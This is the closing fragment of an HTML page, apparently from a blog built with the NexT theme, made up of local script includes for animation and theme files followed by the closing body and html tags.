  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
